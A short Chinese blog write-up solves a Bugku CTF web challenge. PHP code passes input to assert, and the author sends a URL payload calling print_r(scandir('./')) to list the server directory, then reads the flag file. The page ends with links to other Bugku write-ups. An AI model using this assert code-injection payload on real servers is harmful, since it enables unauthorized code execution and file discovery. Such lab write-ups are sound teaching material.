发现到后面的题目越来越能学到新的东西,因此需要详细的记录下解题过程。
首先打开题目的时候
发现里面的代码说明可以assert从而随意执行代码,而我们需要知道该目录下存在哪些文件。
php中读取目录下文件的方法:
最简单的是print_r(scandir($dir))
还可以利用print_r(glob("*.*"))
(参考 https://blog.csdn.net/zhangxiaomaphp/article/details/42105729)
因此我们构造payload:http://120.24.86.145:8010/?s=print_r(scandir('./'))
里面有f14g.txt,则直接获取里面的内容http://120.24.86.145:8010/f14g.txt 得到flag
发现到后面的题目越来越能学到新的东西,因此需要详细的记录下解题过程。 首先打开题目的时候 发现里面的代码说明可以a...
bugku rsa 一道关于rsa常规的ctf题目(来自bugku):链接:https://ctf.bugku.c...
Bugku-代码审计 https://ctf.bugku.com/challenges 1、extract变量覆盖...
去训练一下基础! Bugku地址:https://ctf.bugku.com/challenges 0x01 we...
BUGKU -加密 1、滴答,滴 -... -.- -.-. - ..-. -- .. ... -.-. 很明显是...
https://www.bugku.com/jishu/204.html
工具 BurpSuite Chrome插件Proxy SwitchyOmega sqlmap 示例:BugKu...
title: Bugku Web Write update: 2019-04-07 11:07:19tags:- ...
BugKu-网站被黑 原题链接 http://120.24.86.145:8002/webshell/ 分析 一眼...
题目:速度要快 【Bugku】http://123.206.87.240:8002/web6/ 序 开始的时候这道...
本文标题:bugku 过狗一句话
本文链接:https://www.haomeiwen.com/subject/hpqoaftx.html
网友评论